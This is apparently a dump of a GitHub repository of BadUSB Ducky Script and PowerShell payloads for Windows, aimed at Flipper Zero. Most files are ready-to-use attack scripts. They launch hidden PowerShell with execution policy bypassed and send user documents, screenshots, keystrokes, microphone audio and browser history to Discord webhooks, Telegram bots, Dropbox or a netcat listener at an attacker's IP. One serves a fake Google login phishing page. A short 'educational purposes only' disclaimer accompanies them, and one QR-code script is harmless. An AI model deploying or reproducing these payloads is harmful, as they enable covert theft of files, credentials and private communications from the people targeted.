REM Author: @beigeworm 3 | REM Description: Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. 4 | REM Target: Windows 10,11 5 | 6 | REM SETUP 7 | REM make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 8 | REM generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 9 | 10 | REM Setup for duckyscript 11 | DEFAULT_DELAY 100 12 | 13 | REM open powershell (remove -W Hidden to show the window) 14 | GUI r 15 | DELAY 750 16 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 17 | CTRL-SHIFT ENTER 18 | DELAY 1500 19 | ALT y 20 | 21 | STRING $accessToken = "DROPBOX_ACCESS_TOKEN_HERE" 22 | STRING ;$localFolderPath = "$env:USERPROFILE"; $computerName = "$env:COMPUTERNAME"; $dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" 23 | STRING ;$dropboxFolderPath = $computerName.ToString(); $dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" 24 | ENTER 25 | STRING $headers = @{"Authorization" = "Bearer $accessToken" 26 | ENTER 27 | STRING "Content-Type" = "application/octet-stream"} 28 | ENTER 29 | STRING $body = @{"path" = "/$computerName" 30 | ENTER 31 | STRING "autorename" = $true}| ConvertTo-Json; $files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse 32 | ENTER 33 | STRING foreach($file in $files){$relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') 34 | STRING ;$dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') 35 | STRING ;$headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" 36 | STRING ;try{$fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) 37 | STRING ;$response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes}catch{}} 38 | ENTER 39 | -------------------------------------------------------------------------------- /OSINT/Screenshot to Telegram.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Desktop Screenshot to Telegram. 2 | REM Author: @beigeworm 3 | REM Description: Using a Telegram Bot's Chat to receive a screenshot of the desktop. 4 | REM Target: Windows 10 and 11 5 | 6 | REM SETUP INSTRUCTIONS 7 | REM 1. Install Telegram and make an account if you haven't already. 8 | REM 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 9 | REM 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 10 | REM 4. Run the script on target system 11 | REM 5. Check telegram chat for 'waiting to connect' message. 12 | REM 6. This script has a feature to wait until you start the session from Telegram. 13 | REM 7. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer. 14 | REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token 15 | 16 | REM some setup for dukie script 17 | DEFAULT_DELAY 100 18 | 19 | GUI r 20 | DELAY 750 21 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 22 | ENTER 23 | DELAY 4000 24 | STRING $Token = "TELEGRAM_TOKEN_HERE";$URL='https://api.telegram.org/bot{0}' -f $Token;while($chatID.length -eq 0){$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10}Add-Type -AssemblyName System.Windows.Forms;$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height;$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size);$filePath = "$env:temp\sc.png";$bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png);$graphics.Dispose();$bitmap.Dispose();curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $filePath;exit 25 | DELAY 500 26 | ENTER 27 | -------------------------------------------------------------------------------- /OSINT/Exfiltrate files to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: beigeworm's Exfiltrate files to Discord. 2 | REM Author: @beigeworm 3 | REM Description: Using a Discord webhook to receive all matching files in bulk zips of 25mb each. (searches user folders for pictures, video, text files etc..) 4 | REM Target: Windows 10 and 11 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | GUI r 10 | DELAY 750 11 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 12 | ENTER 13 | DELAY 4000 14 | STRING $hookurl = "WEBHOOK_HERE";Function Exfiltrate {$maxZipFileSize = 24MB;$currentZipSize = 0;$index = 1;$zipFilePath ="$env:temp/Loot$index.zip";$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");Add-Type -AssemblyName System.IO.Compression.FileSystem;$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create');foreach ($folder in $foldersToSearch) {foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse;foreach ($file in $files) {$fileSize = $file.Length;if($currentZipSize + $fileSize -gt $maxZipFileSize){$zipArchive.Dispose();$currentZipSize = 0;curl.exe -F file1=@"$zipFilePath" $hookurl;Remove-Item -Path $zipFilePath -Force;Sleep 1;$index++;$zipFilePath ="$env:temp/Loot$index.zip";$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')}$entryName = $file.FullName.Substring($folder.Length + 1);[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName);$currentZipSize += $fileSize}}}$zipArchive.Dispose();curl.exe -F file1=@"$zipFilePath" $hookurl;Remove-Item -Path $zipFilePath -Force;Write-Output "$env:COMPUTERNAME : Exfiltration Complete."}Exfiltrate;sleep 5;exit 15 | DELAY 500 16 | ENTER 17 | -------------------------------------------------------------------------------- /OSINT/Exfiltrate Files to USB Drive.txt: -------------------------------------------------------------------------------- 1 | REM Title: Exfiltrate files to Removable Drive 2 | REM Author: @beigeworm 3 | REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive 4 | REM Target: Windows 10 and 11 5 | 6 | REM 1. Run this script. 7 | REM 2. Connect your USB drive 8 | 9 | REM some setup for dukie script 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | STRING powershell -NoP -Exec Bypass 15 | ENTER 16 | DELAY 4000 17 | STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit 18 | ENTER 19 | -------------------------------------------------------------------------------- /OSINT/Google Login Phish to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Fake Google Login to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to open a webview window with a phishing page that sends the results to a discord webhook. 4 | REM Target: Windows 10 5 | 6 | REM **YOU WILL NEED THIS HTML FILE TO EDIT AND CONVERT** (https://github.com/beigeworm/assets/blob/main/login.html) 7 | REM Please don't be a bum hole and use this to pwn people, it is meant as a proof of concept only. 8 | 9 | REM *SETUP* 10 | REM replace WEBHOOK_HERE with a webhook and encode all the html to base 64. (HTML CODE LINK ABOVE) 11 | REM then replace YOUR_BASE64_ENCODED_HTML_HERE with the base64 string. 12 | REM Base65 encoder - https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Base64-Encoder-Decoder-GUI.ps1 13 | 14 | REM some setup for dukie script 15 | DEFAULT_DELAY 100 16 | 17 | REM open powershell (remove -W Hidden to show the window). 18 | GUI r 19 | DELAY 750 20 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 21 | CTRL-SHIFT ENTER 22 | DELAY 1500 23 | ALT y 24 | DELAY 5000 25 | 26 | STRING $encodedText = 'YOUR_BASE64_ENCODED_HTML_HERE' 27 | ENTER 28 | STRING $decodedBytes = [System.Convert]::FromBase64String($encodedText);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedBytes);$outputFile = "$env:temp\google.html";Set-Content -Path $outputFile -Value $decodedText -Encoding UTF8 29 | ENTER 30 | STRING$htmlFile = "$env:temp\google.html";$screen = [System.Windows.Forms.Screen]::PrimaryScreen;$screenWidth = $screen.WorkingArea.Width;$screenHeight = $screen.WorkingArea.Height;$left = ($screenWidth - $width) / 2;$top = ($screenHeight - $height) / 2;$chromePath = "C:\Program Files\Google\Chrome\Application\chrome.exe";$width = 530;$height = 600 31 | ENTER 32 | STRING $arguments = "--new-window --window-position=$left,$top --window-size=$width,$height --app=$htmlFile";$chromeProcess = Start-Process -FilePath $chromePath -ArgumentList $arguments -PassThru;$chromeProcess.WaitForExit() 33 | ENTER 34 | 35 | 36 | -------------------------------------------------------------------------------- /Netcat-Screenshare/main.ps1: -------------------------------------------------------------------------------- 1 | $IP = "$ip" 2 | $PORT = "9000" 3 | 4 | while ($true){ 5 | try{ 6 | Add-Type -AssemblyName System.Windows.Forms 7 | [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream 8 | $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp) 9 | $socket.Connect($IP,$PORT) 10 | 11 | function SendResponse($sock, $string){ 12 | if ($sock.Connected){ 13 | $bytesSent = $sock.Send($string) 14 | if ( $bytesSent -eq -1 ){}}} 15 | 16 | function SendStrResponse($sock, $string){ 17 | if ($sock.Connected){ 18 | $bytesSent = $sock.Send( 19 | [text.Encoding]::Ascii.GetBytes($string)) 20 | if ( $bytesSent -eq -1 ){}}} 21 | 22 | function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){ 23 | $response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n" 24 | SendStrResponse $sock $response} 25 | SendHeader $socket 26 | 27 | while ($True){ 28 | $b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height) 29 | $g = [System.Drawing.Graphics]::FromImage($b) 30 | $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size) 31 | $g.Dispose() 32 | $MemoryStream.SetLength(0) 33 | $b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg)) 34 | $b.Dispose() 35 | $length = $MemoryStream.Length 36 | [byte[]] $Bytes = $MemoryStream.ToArray() 37 | $str = "`n`n--boundary`n" + 38 | "Content-Type: image/jpeg`n" + 39 | "Content-Length: $length`n`n" 40 | SendStrResponse $socket $str 41 | SendResponse $socket $Bytes 42 | } 43 | $MemoryStream.Close() 44 | }catch{Write-Error $_}} 45 | 46 | -------------------------------------------------------------------------------- /OSINT/Record-Mic-to-Discord.txt.txt: -------------------------------------------------------------------------------- 1 | REM Title: Record Mic To Discord 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: record a 60 second audio file from the microphone and send to discord. 4 | REM Target: Windows 10 5 | 6 | REM SETUP 7 | REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook. 8 | 9 | REM some setup for dukie script. 10 | DEFAULT_DELAY 100 11 | 12 | GUI r 13 | DELAY 750 14 | 15 | REM open powershell (add "-W Hidden" to hide the window). 16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 5000 19 | 20 | STRING $hookurl = 'YOUR_WEBHOOK_HERE';Function RecordAudio{param ([int[]]$t);$Path = "$env:Temp\ffmpeg.exe";If (!(Test-Path $Path)){$url = "http://beigenet.duckdns.org/files/Win10Tools/ffmpeg.exe";iwr -Uri $url -OutFile $Path};sleep 1;Add-Type '[Guid("D666063F-1587-4E43-81F1-B948E807363F"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDevice {int a(); int o();int GetId([MarshalAs(UnmanagedType.LPWStr)] out string id);}[Guid("A95664D2-9614-4F35-A746-DE8DB63617E6"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDeviceEnumerator {int f();int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint);}[ComImport, Guid("BCDE0395-E52F-467C-8E3D-C4579291692E")] class MMDeviceEnumeratorComObject { }public static string GetDefault (int direction) {var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator;IMMDevice dev = null;Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(direction, 1, out dev));string id = null;Marshal.ThrowExceptionForHR(dev.GetId(out id));return id;}' -name audio -Namespace system;function getFriendlyName($id) {$reg = "HKLM:\SYSTEM\CurrentControlSet\Enum\SWD\MMDEVAPI\$id";return (get-ItemProperty $reg).FriendlyName};$id1 = [audio]::GetDefault(1);$MicName = "$(getFriendlyName $id1)"; Write-Output $MicName;$mp3Path = "$env:Temp\AudioClip.mp3";if ($t.Length -eq 0){$t = 10}.$env:Temp\ffmpeg.exe -f dshow -i audio="$MicName" -t $t -c:a libmp3lame -ar 44100 -b:a 128k -ac 1 $mp3Path;curl.exe -F file1=@"$mp3Path" $hookurl | Out-Null;sleep 1;rm -Path $mp3Path -Force}RecordAudio -t 60;exit 21 | ENTER -------------------------------------------------------------------------------- /Browser-History-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $whuri = "$dc" 3 | 4 | # shortened URL Detection 5 | if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} 6 | 7 | $outpath = "$env:temp\history.txt" 8 | "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII 9 | 10 | # Define the Regular expression for extracting history and bookmarks 11 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 12 | 13 | # Define paths for data storage 14 | $Paths = @{ 15 | 'chrome_history' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" 16 | 'chrome_bookmarks' = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" 17 | 'edge_history' = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History" 18 | 'edge_bookmarks' = "$env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks" 19 | 'firefox_history' = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite" 20 | 'opera_history' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\History" 21 | 'opera_bookmarks' = "$Env:USERPROFILE\AppData\Roaming\Opera Software\Opera GX Stable\Bookmarks" 22 | } 23 | 24 | # Define browsers and data 25 | $Browsers = @('chrome', 'edge', 'firefox', 'opera') 26 | $DataValues = @('history', 'bookmarks') 27 | 28 | foreach ($Browser in $Browsers) { 29 | foreach ($DataValue in $DataValues) { 30 | $PathKey = "${Browser}_${DataValue}" 31 | $Path = $Paths[$PathKey] 32 | 33 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex | % {($_.Matches).Value} | Sort -Unique 34 | 35 | $Value | ForEach-Object { 36 | [PSCustomObject]@{ 37 | Browser = $Browser 38 | DataType = $DataValue 39 | Content = $_ 40 | } 41 | } | Out-File -FilePath $outpath -Append 42 | } 43 | } 44 | 45 | curl.exe -F file1=@"$outPath" $whuri | Out-Null 46 | sleep 2 47 | Remove-Item -Path $outPath -force 48 | -------------------------------------------------------------------------------- /OSINT/Keylogger to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Keylogger to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to gather keystroke info and send it via Discord. 4 | REM Target: Windows 10 5 | REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys 6 | 7 | REM *SETUP* 8 | REM replace WEBHOOK_GOES_HERE with your discord webhook. 9 | 10 | 11 | REM some setup for dukie script 12 | DEFAULT_DELAY 100 13 | 14 | REM Open Powershell and start logs. 15 | DELAY 1000 16 | GUI r 17 | DELAY 500 18 | STRING powershell -NoP -NonI -Exec Bypass -W hidden 19 | ENTER 20 | DELAY 5000 21 | STRING $dc = "WEBHOOK_GOES_HERE!";$a = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);';$a = Add-Type -MemberDefinition $a -Name 'Win32' -Namespace API -PassThru;$b = [System.Diagnostics.Stopwatch]::StartNew();$c = [TimeSpan]::FromSeconds(10);While($true){$d = $false;try{while ($b.Elapsed -lt $c){Sleep -Milliseconds 30;for($e = 8; $e -le 254; $e++){$f = $a::GetAsyncKeyState($e);if ($f -eq -32767){$d = $true;$b.Restart();$null = [console]::CapsLock;$g = $a::MapVirtualKey($e, 3);$h = New-Object Byte[] 256;$j = $a::GetKeyboardState($h);$k = New-Object -TypeName System.Text.StringBuilder;if($a::ToUnicode($e, $g, $h, $k, $k.Capacity, 0)){;$l = $k.ToString();if ($e -eq 8) {$l = "[BKSP]"};if ($e -eq 13) {$l = "[ENT]"};if ($e -eq 27) {$l = "[ESC]"};$m += $l}}}}}finally{If($d){$n = $m -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')};$o = Get-Date -Format "dd-MM-yyyy HH:mm:ss";$p = $o+" : "+'`'+$n+'`';$q = @{"username" = "$env:COMPUTERNAME" ;"content" = $p} | ConvertTo-Json;irm -Uri $dc -Method Post -ContentType "application/json" -Body $q;$d = $false;$m = ""}}$b.Restart();Sleep -Milliseconds 10} 22 | ENTER 23 | -------------------------------------------------------------------------------- /Exfiltrate-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | 3 | $hookurl = "$dc" 4 | # shortened URL Detection 5 | if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url} 6 | 7 | Function Exfiltrate { 8 | 9 | param ([string[]]$FileType,[string[]]$Path) 10 | $maxZipFileSize = 25MB 11 | $currentZipSize = 0 12 | $index = 1 13 | $zipFilePath ="$env:temp/Loot$index.zip" 14 | 15 | If($Path -ne $null){ 16 | $foldersToSearch = "$env:USERPROFILE\"+$Path 17 | }else{ 18 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 19 | } 20 | 21 | If($FileType -ne $null){ 22 | $fileExtensions = "*."+$FileType 23 | }else { 24 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 25 | } 26 | 27 | Add-Type -AssemblyName System.IO.Compression.FileSystem 28 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 29 | 30 | foreach ($folder in $foldersToSearch) { 31 | foreach ($extension in $fileExtensions) { 32 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 33 | foreach ($file in $files) { 34 | $fileSize = $file.Length 35 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 36 | $zipArchive.Dispose() 37 | $currentZipSize = 0 38 | curl.exe -F file1=@"$zipFilePath" $hookurl 39 | Remove-Item -Path $zipFilePath -Force 40 | Sleep 1 41 | $index++ 42 | $zipFilePath ="$env:temp/Loot$index.zip" 43 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 44 | } 45 | $entryName = $file.FullName.Substring($folder.Length + 1) 46 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 47 | $currentZipSize += $fileSize 48 | } 49 | } 50 | } 51 | $zipArchive.Dispose() 52 | curl.exe -F file1=@"$zipFilePath" $hookurl 53 | Remove-Item -Path $zipFilePath -Force 54 | Write-Output "$env:COMPUTERNAME : Exfiltration Complete." 55 | } 56 | 57 | Exfiltrate 58 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Ducky-Script-For-FlipperZero 2 | This repository is a collection of scripts which have been updated specifically For the BadUSB/BadKB function on FlipperZero. 3 | They should however work just fine on any device that uses Ducky Script. 4 | These scripts range from harmless pranks to nefarious red team tools. For educational purposes only! 5 | 6 | **These payloads are all for Windows systems** 7 | 8 | **If you want to learn more about the code, most of these scripts are in powershell format here** 9 | 10 | https://github.com/beigeworm/Powershell-Tools-and-Toys - Repository of 50+ powewrshell scripts. 11 | 12 | https://github.com/beigeworm/PoshGram-C2 - A Telegram C2 client in powrshell. 13 | 14 | https://github.com/beigeworm/PoshCord-C2 - A Discord C2 client in powershell. 15 | 16 | # Pre-Deployment Setup 17 | Most of these scripts will require some setup before they will work. 18 | Make sure to read through all the scripts and follow any setup instructions. 19 | 20 | **Setup for Telegram, Discord, Dropbox** 21 | 22 | **DROPBOX ACCESS TOKEN SETUP** 23 | 1. make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 24 | 2. generate an access token for your app. 25 | (Dropbox access tokens expire after 7 days.) 26 | 27 | **DISCORD WEBHOOK SETUP** 28 | 1. (Server Admin Required) On a discord server chat goto > "edit channel" > "integrations" > "webhooks" 29 | 2. make a new webhook, name it and then click "copy webhook URL". 30 | 31 | **TELEGRAM TOKEN SETUP** 32 | 1. Install Telegram and make an account if you haven't already. 33 | 2. Visit https://t.me/botfather and make a bot. (make a note of the API token) 34 | 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start) 35 | 4. Visit https://github.com/beigeworm/Powershell-Tools-and-Toys/tree/main/Command-and-Control for more info 36 | ---------------------------------------------------------------------------------------------------------------------------------------------------- 37 | 38 | # Notes 39 | 40 | Further setup instructions are within each payload file (if applicable). 41 | 42 | **You Should ALWAYS Read Any Scripts BEFORE running them** 43 | 44 | Fast-Execution-Scripts and GUI-Tools are pulled from github and staged using the 'Invoke-Expession' command. 45 | 46 | Most other scripts were designed to avoid downloading external scripts or programs. 47 | -------------------------------------------------------------------------------- /Console-QRcode/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# ======================== COLSOLE QR CODE GENERATOR ================================== 3 | 4 | SYNOPSIS 5 | Use 'chart.googleapis.com' to create a qrcode then represent the qrcode in the console! 6 | 7 | USAGE 8 | 1. Run script 9 | 2. Enter text or url to generate 10 | 3. Choose invert colors or not 11 | 4. Check console for results 12 | #> 13 | 14 | $URL = "$text" 15 | $highC = 'y' 16 | $inverse = 'n' 17 | 18 | Add-Type -AssemblyName System.Windows.Forms 19 | Add-Type -AssemblyName System.Drawing 20 | [Console]::BackgroundColor = "Black" 21 | 22 | $wshell = New-Object -ComObject wscript.shell 23 | $wshell.AppActivate("Powershell.exe") 24 | $wshell.SendKeys("{F11}") 25 | 26 | cls 27 | 28 | function Generate-QRCodeURL { 29 | param ([string]$URL,[int]$sizePercentage = 50) 30 | $EncodedURL = [uri]::EscapeDataString($URL) 31 | $newSize = [math]::Round((300 * $sizePercentage) / 100) 32 | $QRCodeURL = "https://chart.googleapis.com/chart?chs=${newSize}x${newSize}&cht=qr&chl=$EncodedURL" 33 | return $QRCodeURL 34 | } 35 | 36 | $QRCodeURL = Generate-QRCodeURL -URL $URL 37 | 38 | function Download-QRCodeImage { 39 | param ([string]$QRCodeURL) 40 | $TempFile = [System.IO.Path]::GetTempFileName() + ".png" 41 | Invoke-WebRequest -Uri $QRCodeURL -OutFile $TempFile 42 | return $TempFile 43 | } 44 | 45 | $QRCodeURL = Generate-QRCodeURL -URL $URL 46 | $QRCodeImageFile = Download-QRCodeImage -QRCodeURL $QRCodeURL 47 | $QRCodeImage = [System.Drawing.Image]::FromFile($QRCodeImageFile) 48 | $Bitmap = New-Object System.Drawing.Bitmap($QRCodeImage) 49 | 50 | if (($highC -eq 'n') -and ($inverse -eq 'y')){ 51 | $Chars = @('░', '█') 52 | } 53 | elseif (($highC -eq 'n') -and ($inverse -eq 'n')){ 54 | $Chars = @('█', '░') 55 | } 56 | 57 | if (($highC -eq 'y') -and ($inverse -eq 'y')){ 58 | $Chars = @(' ', '█') 59 | } 60 | elseif (($highC -eq 'y') -and ($inverse -eq 'n')){ 61 | $Chars = @('█', ' ') 62 | } 63 | 64 | for ($y = 0; $y -lt $Bitmap.Height; $y += 2) { 65 | for ($x = 0; $x -lt $Bitmap.Width; $x++) { 66 | $Index = if ($Bitmap.GetPixel($x, $y).ToArgb() -eq -16777216) { 1 } else { 0 } # Check if the pixel is black or white 67 | Write-Host -NoNewline $Chars[$Index] 68 | } 69 | Write-Host 70 | } 71 | 72 | $QRCodeImage.Dispose() 73 | Remove-Item -Path $QRCodeImageFile -Force 74 | pause -------------------------------------------------------------------------------- /OSINT/Desktop Screenshare over Netcat.txt: -------------------------------------------------------------------------------- 1 | REM Title: Beigeworm's Desktop Screenshare Through Netcat 2 | REM Author: @beigeworm 3 | REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window. 4 | REM Target: Windows 10 5 | 6 | REM *SETUP* 7 | REM replace YOUR_IP_HERE with your netcat attacker IP Address. 8 | REM Run script on target Windows system. 9 | REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required) 10 | REM Then in a firefox browser (ONLY) on the Linux box > http://localhost:8080 11 | 12 | REM some setup for dukie script 13 | DEFAULT_DELAY 100 14 | 15 | GUI r 16 | DELAY 750 17 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 18 | ENTER 19 | DELAY 4000 20 | STRING $IP = "YOUR_IP_ADDRESS_OR_DOMAIN";$PORT = "9000";while($true){try{Add-Type -AssemblyName System.Windows.Forms;[System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream;$socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp);$socket.Connect($IP,$PORT);function SendResponse($sock, $string){if($sock.Connected){$bytesSent = $sock.Send($string);if( $bytesSent -eq -1 ){}}};function SendStrResponse($sock, $string){if($sock.Connected){$bytesSent = $sock.Send([text.Encoding]::Ascii.GetBytes($string));if( $bytesSent -eq -1 ){}}};function SendHeader([net.sockets.socket] $sock,$length,$statusCode = "200 OK",$mimeHeader="text/html",$httpVersion="HTTP/1.1"){$response = "HTTP/1.1 $statusCode`r`n" + "Content-Type: multipart/x-mixed-replace; boundary=--boundary`r`n`n";SendStrResponse $sock $response}SendHeader $socket;while ($True){$b = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$g = [System.Drawing.Graphics]::FromImage($b);$g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size);$g.Dispose();$MemoryStream.SetLength(0);$b.Save($MemoryStream, ([system.drawing.imaging.imageformat]::jpeg));$b.Dispose();$length = $MemoryStream.Length;[byte[]] $Bytes = $MemoryStream.ToArray();$str = "`n`n--boundary`n" + "Content-Type: image/jpeg`n" + "Content-Length: $length`n`n";SendStrResponse $socket $str;SendResponse $socket $Bytes}$MemoryStream.Close()}catch{Write-Error $_}};exit 21 | DELAY 500 22 | ENTER 